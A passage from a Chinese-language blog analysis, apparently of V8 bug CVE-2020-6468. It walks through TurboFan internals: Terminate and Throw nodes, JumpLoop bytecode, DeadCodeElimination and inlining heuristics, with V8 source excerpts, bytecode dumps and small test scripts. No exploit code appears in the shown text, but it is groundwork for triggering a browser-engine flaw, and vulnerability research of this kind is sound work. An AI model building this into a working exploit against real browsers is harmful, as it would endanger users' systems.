class="params">(Handle&lt;JSFunction&gt; function)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">JSFunction::EnsureFeedbackVector</span><span class="params">(Handle&lt;JSFunction&gt; function)</span></span></span><br></pre></td></tr></table></figure></li><li><p>由于该内置函数只是为对应的 JSFunction <strong>准备 FeedbackVector</strong>（请记住这个准备操作），因此<strong>可以通过多次调用目标函数</strong>来准备 FeedbackVector，替换该内置函数的调用。</p></li></ul><h4 id="b-JIT-kThrow结点">b. JIT kThrow结点</h4><p><code>Throw</code> 类型的结点将以如下调用链添加进 BytecodeGraph 中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildGraphFromBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::CreateGraph</span><span class="params">()</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitBytecodes</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSingleBytecode</span><span class="params">()</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitThrow</span><span class="params">()</span> \</span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitAbort</span><span class="params">()</span> \</span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitReThrow</span><span class="params">()</span></span></span><br></pre></td></tr></table></figure><p>我们可以直接在 JS 代码中插入一条 <code>throw</code> 语句来生成一个 <code>Throw</code> 字节码：</p><p><img src="/2021/02/CVE-2020-6468/throw_bytecode.png" alt="img"></p><p>实际上，Throw 结点在v8中频繁产生。归根到底，是因为对于图中控制流不可能到达的结点，turboFan 会将其更换成 throw 结点，这与 v8 C++ 代码中 <code>UNREACHABLE</code> 函数的使用，有着异曲同工之处。</p><h4 id="c-JIT-kTerminate-结点">c. JIT kTerminate 结点</h4><ul><li><p><code>Terminate</code> 类型的结点，将以如下调用链，添加进 BytecodeGraph 中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildGraphFromBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="type">void</span> <span class="title">BytecodeGraphBuilder::CreateGraph</span><span class="params">()</span></span></span><br><span class="line"><span class="function">      <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitBytecodes</span><span class="params">()</span></span></span><br><span class="line"><span class="function">        <span class="type">void</span> <span class="title">BytecodeGraphBuilder::VisitSingleBytecode</span><span class="params">()</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildLoopHeaderEnvironment</span><span class="params">(<span class="type">int</span>)</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> BytecodeGraphBuilder::<span class="title">Environment::PrepareForLoop</span><span class="params">(...)</span></span></span><br></pre></td></tr></table></figure><p>添加的具体代码见如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">void</span> BytecodeGraphBuilder::Environment::<span class="built_in">PrepareForLoop</span>(</span><br><span class="line">    <span class="type">const</span> BytecodeLoopAssignments&amp; assignments,</span><br><span class="line">    <span class="type">const</span> BytecodeLivenessState* liveness) &#123;</span><br><span class="line">  <span class="comment">// Create a control node for the loop header.</span></span><br><span class="line">  Node* control = <span class="built_in">builder</span>()-&gt;<span class="built_in">NewLoop</span>();</span><br><span class="line"></span><br><span class="line">  <span class="comment">// 建立 Phi 相关的结点</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">    </span><br><span class="line">  <span class="comment">// The accumulator should not be live on entry.</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// Connect to the loop end.</span></span><br><span class="line">  <span class="comment">// 这里添加了 terminate 结点</span></span><br><span class="line">  Node* terminate = <span class="built_in">builder</span>()-&gt;<span class="built_in">graph</span>()-&gt;<span class="built_in">NewNode</span>(</span><br><span class="line">      <span class="built_in">builder</span>()-&gt;<span class="built_in">common</span>()-&gt;<span class="built_in">Terminate</span>(), effect, control);</span><br><span class="line">  <span class="built_in">builder</span>()-&gt;exit_controls_.<span class="built_in">push_back</span>(terminate);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>但需要注意的是，并不是一执行<code>BuildGraphFromBytecode</code>函数就一定能添加 terminate 结点，该添加操作还受到一个判断条件的约束，只有满足 LoopHeader 的 Bytecode 才能添加 terminate 结点：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildLoopHeaderEnvironment</span><span class="params">(<span class="type">int</span> current_offset)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// 注意该判断条件</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">bytecode_analysis</span>().<span class="built_in">IsLoopHeader</span>(current_offset)) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// Add loop header.</span></span><br><span class="line">    <span class="built_in">environment</span>()-&gt;<span class="built_in">PrepareForLoop</span>(loop_info.<span class="built_in">assignments</span>(), liveness);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>为了<strong>通过该 LoopHeader 的判断条件</strong>，我们需要继续向下探究。LoopHeader 实际以如下调用链添加进 BytecodeAnalysis 实例中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeGraphBuilder::BuildGraphFromBytecode</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">    <span class="title">BytecodeGraphBuilder::BytecodeGraphBuilder</span><span class="params">(,...)</span></span></span><br><span class="line"><span class="function">      BytecodeAnalysis <span class="type">const</span>&amp; <span class="title">JSHeapBroker::GetBytecodeAnalysis</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">        <span class="title">BytecodeAnalysis::BytecodeAnalysis</span><span class="params">(...)</span></span></span><br><span class="line"><span class="function">          <span class="type">void</span> <span class="title">BytecodeAnalysis::Analyze</span><span class="params">()</span></span></span><br><span class="line"><span class="function">            <span class="type">void</span> <span class="title">BytecodeAnalysis::PushLoop</span><span class="params">(...)</span> <span class="comment">// 添加 LoopHeader</span></span></span><br></pre></td></tr></table></figure><p>通过审计 BytecodeAnalysis::Analyze 函数的代码，我们可以发现， 只有当 bytecode 为 <code>Bytecode::kJumpLoop</code>时， LoopHeader 才会被添加进 BytecodeAnalysis 实例中：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">BytecodeAnalysis::Analyze</span><span class="params">()</span> </span>&#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// 遍历 bytecode</span></span><br><span class="line">    <span class="function">interpreter::BytecodeArrayRandomIterator <span class="title">iterator</span><span class="params">(bytecode_array(), zone())</span></span>;</span><br><span class="line">    <span class="keyword">for</span> (iterator.<span class="built_in">GoToEnd</span>(); iterator.<span class="built_in">IsValid</span>(); --iterator) &#123;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">        <span class="comment">// 当 bytecode 为 JumpLoop 时</span></span><br><span class="line">        <span class="keyword">if</span> (bytecode == Bytecode::kJumpLoop) &#123;</span><br><span class="line">          <span class="comment">// Every byte up to and including the last byte within the backwards jump</span></span><br><span class="line">          <span class="comment">// instruction is considered part of the loop, set loop end accordingly.</span></span><br><span class="line">          <span class="type">int</span> loop_end = current_offset + iterator.<span class="built_in">current_bytecode_size</span>();</span><br><span class="line">          <span class="type">int</span> loop_header = iterator.<span class="built_in">GetJumpTargetOffset</span>();</span><br><span class="line">          <span class="comment">// 添加 LoopHeader</span></span><br><span class="line">          <span class="built_in">PushLoop</span>(loop_header, loop_end);</span><br><span class="line">          <span class="comment">// ...</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// ...</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>那么，什么样的 JS 代码生成的 bytecode 中会有 <code>Bytecode::kJumpLoop</code> 呢？通过测试我们发现，<strong>任何的循环都会有<code>JumpLoop</code> 字节码</strong>。<code>JumpLoop</code>实际上与汇编中循环末尾的 JMP 指令没什么太大的差异，只是 v8 中的字节码显著标识<strong>该 Jump 操作跳转回 Loop 里</strong>。</p><p>以下是一个测试用的 JS 代码：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; ii; a++)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="variable language_">console</span>.<span class="title function_">log</span>(ii);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>对应生成的 bytecode：</p><figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">15</span> E&gt; <span class="number">0x11ce08250232</span> @    <span class="number">0</span> : a7                StackCheck </span><br><span class="line"><span class="number">38</span> S&gt; <span class="number">0x11ce08250233</span> @    <span class="number">1</span> : <span class="number">0b</span>                LdaZero </span><br><span class="line">      <span class="number">0x11ce08250234</span> @    <span class="number">2</span> : <span class="number">26</span> fb             Star <span class="built_in">r0</span></span><br><span class="line"><span class="number">43</span> S&gt; <span class="number">0x11ce08250236</span> @    <span class="number">4</span> : <span class="number">25</span> <span class="number">02</span>             Ldar a0</span><br><span class="line"><span class="number">43</span> E&gt; <span class="number">0x11ce08250238</span> @    <span class="number">6</span> : <span class="number">69</span> fb <span class="number">00</span>          TestLessThan <span class="built_in">r0</span>, [<span class="number">0</span>]</span><br><span class="line">      <span class="number">0x11ce0825023b</span> @    <span class="number">9</span> : 9a 1c             JumpIfFalse [<span class="number">28</span>] (<span class="number">0x11ce08250257</span> @ <span class="number">37</span>)</span><br><span class="line"><span class="number">26</span> E&gt; <span class="number">0x11ce0825023d</span> @   <span class="number">11</span> : a7                StackCheck </span><br><span class="line"><span class="number">68</span> S&gt; <span class="number">0x11ce0825023e</span> @   <span class="number">12</span> : <span class="number">13</span> <span class="number">00</span> <span class="number">01</span>          LdaGlobal [<span class="number">0</span>], [<span class="number">1</span>]</span><br><span class="line">      <span class="number">0x11ce08250241</span> @   <span class="number">15</span> : <span class="number">26</span> f9             Star <span class="built_in">r2</span></span><br><span class="line"><span class="number">76</span> E&gt; <span class="number">0x11ce08250243</span> @   <span class="number">17</span> : <span class="number">28</span> f9 <span class="number">01</span> <span class="number">03</span>       LdaNamedProperty <span class="built_in">r2</span>, [<span class="number">1</span>], [<span class="number">3</span>]</span><br><span class="line">      <span class="number">0x11ce08250247</span> @   <span class="number">21</span> : <span class="number">26</span> fa             Star <span class="built_in">r1</span></span><br><span class="line"><span class="number">76</span> E&gt; <span class="number">0x11ce08250249</span> @   <span class="number">23</span> : <span class="number">59</span> fa f9 <span class="number">02</span> <span class="number">05</span>    CallProperty1 <span class="built_in">r1</span>, <span class="built_in">r2</span>, a0, [<span class="number">5</span>]</span><br><span class="line"><span class="number">50</span> S&gt; <span class="number">0x11ce0825024e</span> @   <span class="number">28</span> : <span class="number">25</span> fb             Ldar <span class="built_in">r0</span></span><br><span class="line">      <span class="number">0x11ce08250250</span> @   <span class="number">30</span> : 4c <span class="number">07</span>             <span class="keyword">Inc</span> [<span class="number">7</span>]</span><br><span class="line">      <span class="number">0x11ce08250252</span> @   <span class="number">32</span> : <span class="number">26</span> fb             Star <span class="built_in">r0</span></span><br><span class="line">      <span class="number">0x11ce08250254</span> @   <span class="number">34</span> : 8a 1e <span class="number">00</span>          JumpLoop [<span class="number">30</span>], [<span class="number">0</span>] (<span class="number">0x11ce08250236</span> @ <span class="number">4</span>) # 注意这里的 JumpLoop</span><br><span class="line">      <span class="number">0x11ce08250257</span> @   <span class="number">37</span> : <span class="number">0d</span>                LdaUndefined </span><br><span class="line"><span class="number">92</span> S&gt; <span class="number">0x11ce08250258</span> @   <span class="number">38</span> : ab                Return </span><br></pre></td></tr></table></figure><p>通过在 turbolizer 中观察生成的图，可以看到在 BytecodeGraphBuild 阶段成功生成了一个 Terminate 结点：</p><p><img src="/2021/02/CVE-2020-6468/terminateNode.png" alt="img"></p></li></ul><h4 id="d-DeadCodeElimination优化">d. DeadCodeElimination优化</h4><p>DeadCodeElimination 分别位于 <strong>InliningPhase、TypedLoweringPhase等等</strong>，主要将一些 DeadCode 从图中去除，在此我们只侧重讨论其中的部分优化函数。</p><h5 id="1-ReduceLoopOrMerge">1) ReduceLoopOrMerge</h5><p>在上文中我们已经说明，JS 代码中任意的循环均会生成 JumpLoop 的字节码，并进一步生成 Terminate 结点。</p><p>但在实际的动态调试过程中，我们发现该 Terminate 结点在 BytecodeGraphBuilder 阶段生成后，<strong>可在 inlining 优化中的 DeadCodeElimination被优化掉</strong>，当且仅当 <strong>Loop 结点只有一个 input</strong>。</p><p>其中该结点的关键优化函数即为ReduceLoopOrMerge：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DeadCodeElimination::ReduceLoopOrMerge</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 计算活跃的input，并将活跃input向前移动</span></span><br><span class="line">  <span class="type">int</span> live_input_count = <span class="number">0</span>;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">if</span> (live_input_count == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Replace</span>(<span class="built_in">dead</span>());</span><br><span class="line">  <span class="comment">// 如果只有 **一个** 活跃输入</span></span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (live_input_count == <span class="number">1</span>) &#123;</span><br><span class="line">    NodeVector <span class="built_in">loop_exits</span>(zone_);</span><br><span class="line">    <span class="comment">// 遍历所有 Loop 结点的 use 点，即 dest 结点</span></span><br><span class="line">    <span class="keyword">for</span> (Node* <span class="type">const</span> use : node-&gt;<span class="built_in">uses</span>()) &#123;</span><br><span class="line">      <span class="comment">// ...</span></span><br><span class="line">      </span><br><span class="line">      <span class="comment">// 处理 Terminate 结点</span></span><br><span class="line">      &#125; <span class="keyword">else</span> <span class="keyword">if</span> (use-&gt;<span class="built_in">opcode</span>() == IrOpcode::kTerminate) &#123;</span><br><span class="line">        <span class="built_in">DCHECK_EQ</span>(IrOpcode::kLoop, node-&gt;<span class="built_in">opcode</span>());</span><br><span class="line">        <span class="comment">// 将 Terminate 结点杀死</span></span><br><span class="line">        <span class="built_in">Replace</span>(use, <span class="built_in">dead</span>());</span><br><span class="line">      &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// 将当前 Loop 结点优化去除</span></span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Replace</span>(node-&gt;<span class="built_in">InputAt</span>(<span class="number">0</span>));</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>那有没有什么办法能绕过 Loop 结点的优化操作呢？那就是<strong>提高函数调用次数</strong>，使得<strong>增加其 type feedback</strong>（调试坑点之一！）。</p><p>以下面这个 test case 为例：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">3</span>; a ++)</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(opt_me);</span><br><span class="line"><span class="comment">// opt_me 函数执行次数较少</span></span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><p>将会生成如下的图。注意 Loop 结点只有一个 input，此时一旦 DeadCodeElimination 遇到 Loop 结点，该优化将会<strong>立即消除</strong> Terminate 结点。</p><p><img src="/2021/02/CVE-2020-6468/looplittle.png" alt="img"></p><p>而倘若多运行几次目标函数，即：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">3</span>; a ++)</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(opt_me);</span><br><span class="line"><span class="comment">// 这里多运行了22次</span></span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">22</span>; a++)</span><br><span class="line">    <span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><p>那么就会产生以下大相径庭的图，其中 Loop 又多了一个 JSCall 的 input，因此 terminate 结点将在执行完 inlinePhase 后被保留：</p><p><img src="/2021/02/CVE-2020-6468/loopmany.png" alt="img"></p><h5 id="2-ReduceDeoptimizeOrReturnOrTerminateOrTailCall">2) ReduceDeoptimizeOrReturnOrTerminateOrTailCall</h5><p>Terminate 结点只有两个 input ，分别是 EffectPhi (Effect Node) 以及 Loop 结点 (Control Node)。</p><p>该函数对 Terminate 结点的优化较为简单：若当前结点存在 dead input，则只重设了该结点的 input，并设置 opcode 为 <code>kThrow</code>，即<strong>将当前 Terminate 结点更新为 Throw 结点</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">DeadCodeElimination::ReduceDeoptimizeOrReturnOrTerminateOrTailCall</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function">    Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line">  <span class="comment">// 如果当前结点存在 dead input</span></span><br><span class="line">  <span class="keyword">if</span> (<span class="built_in">FindDeadInput</span>(node) != <span class="literal">nullptr</span>) &#123;</span><br><span class="line">    Node* effect = NodeProperties::<span class="built_in">GetEffectInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    Node* control = NodeProperties::<span class="built_in">GetControlInput</span>(node, <span class="number">0</span>);</span><br><span class="line">    <span class="comment">// ...</span></span><br><span class="line">    <span class="comment">// 对当前结点添加一些设置</span></span><br><span class="line">    node-&gt;<span class="built_in">TrimInputCount</span>(<span class="number">2</span>);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">0</span>, effect);</span><br><span class="line">    node-&gt;<span class="built_in">ReplaceInput</span>(<span class="number">1</span>, control);</span><br><span class="line">    <span class="comment">// 将 op 设置为 kThrow</span></span><br><span class="line">    NodeProperties::<span class="built_in">ChangeOp</span>(node, <span class="built_in">common</span>()-&gt;<span class="built_in">Throw</span>());</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">Changed</span>(node);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h4 id="e-JSInliningHeuristic-优化">e. JSInliningHeuristic 优化</h4><ul><li><p>JSInliningHeuristic 位于 <strong>InliningPhase</strong>，主要将一些可被内联的函数进行内联。</p></li><li><p><code>JSInliningHeuristic::Reduce</code>将会对传入的 node 类型进行判断，如果是 <code>JSCall</code> 或者 <code>JSConstruct</code> 结点，则进行下一步的判断，直到最后将当前结点加入至 candidates_ 集合中。这里的 Reduce 操作只是<strong>获取了待内联的函数</strong>集合，真正的内联操作位于 Finalize 函数中。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">Reduction <span class="title">JSInliningHeuristic::Reduce</span><span class="params">(Node* node)</span> </span>&#123;</span><br><span class="line">  <span class="function">DisallowHeapAccessIf <span class="title">no_heap_acess</span><span class="params">(broker()-&gt;is_concurrent_inlining())</span></span>;</span><br><span class="line">  <span class="comment">// check1：判断当前结点是否是 JSCall 或者 JSConstruct 结点</span></span><br><span class="line">  <span class="keyword">if</span> (!IrOpcode::<span class="built_in">IsInlineeOpcode</span>(node-&gt;<span class="built_in">opcode</span>())) <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line"></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// check2：Check if the &#123;node&#125; is an appropriate candidate for inlining.</span></span><br><span class="line">  Candidate candidate = <span class="built_in">CollectFunctions</span>(node, kMaxCallPolymorphism);</span><br><span class="line">  <span class="keyword">if</span> (candidate.num_functions == <span class="number">0</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125; <span class="keyword">else</span> <span class="keyword">if</span> (candidate.num_functions &gt; <span class="number">1</span> &amp;&amp; !FLAG_polymorphic_inlining) &#123;</span><br><span class="line">    <span class="built_in">TRACE</span>(<span class="string">&quot;Not considering call site #&quot;</span></span><br><span class="line">          &lt;&lt; node-&gt;<span class="built_in">id</span>() &lt;&lt; <span class="string">&quot;:&quot;</span> &lt;&lt; node-&gt;<span class="built_in">op</span>()-&gt;<span class="built_in">mnemonic</span>()</span><br><span class="line">          &lt;&lt; <span class="string">&quot;, because polymorphic inlining is disabled&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">  &#125;</span><br><span class="line">    </span><br><span class="line">  <span class="comment">// 剩下的一些无关紧要的check，基本上都能通过</span></span><br><span class="line">  <span class="comment">// ...</span></span><br><span class="line"></span><br><span class="line">  <span class="comment">// 将当前结点加入至 candidates_ 集合中</span></span><br><span class="line">  candidates_.<span class="built_in">insert</span>(candidate);</span><br><span class="line">  <span class="keyword">return</span> <span class="built_in">NoChange</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li><li><p>要想将一个目标的内联函数加入至 candidates_ 集合中，最少要通过 Reduce 函数中的两个关键 check：</p><ul><li>当前结点为 JSCall 或 JSConstruct。</li><li>当前结点的 Callee（即 input[0]）为 Phi 或 JSCreateClosure，并满足一些条件。</li></ul><p>如果目标函数执行的次数较多，即 <code>Feedback Is Sufficient</code>，那么每个 call 都会生成一个 JSCall 结点，同时第二个 check 也会被通过；但如果<strong>目标函数执行的次数较少</strong>（这种情况尤为发生在调试时），那么 JSCall 结点就不会被插入至图中，更别说通过第二个 Check 了。</p><p>以下阐述了<strong>目标函数执行情况</strong> 对 <strong>产生 JSCall 结点</strong>之间的影响，我们先写一段 test case：</p><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">test</span>(<span class="params"></span>)</span><br><span class="line">&#123;</span><br><span class="line">    <span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">3</span>; a ++)</span><br><span class="line">        <span class="variable language_">console</span>.<span class="title function_">log</span>(a);</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">opt_me</span>(<span class="params"></span>) &#123;</span><br><span class="line">    <span class="title function_">test</span>();</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">PrepareFunctionForOptimization</span>(opt_me);</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">let</span> a = <span class="number">0</span>; a &lt; <span class="number">22</span>; a++)</span><br><span class="line">    <span class="title function_">opt_me</span>();</span><br><span class="line">%<span class="title class_">OptimizeFunctionOnNextCall</span>(opt_me);</span><br><span class="line"><span class="title function_">opt_me</span>();</span><br></pre></td></tr></table></figure><p>输出函数 opt_me 的字节码，可以发现：调用 test 函数所对应的字节码为<code>CallUndefinedReceiver0</code>，即建立 JSCall 结点的调用链如下：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span 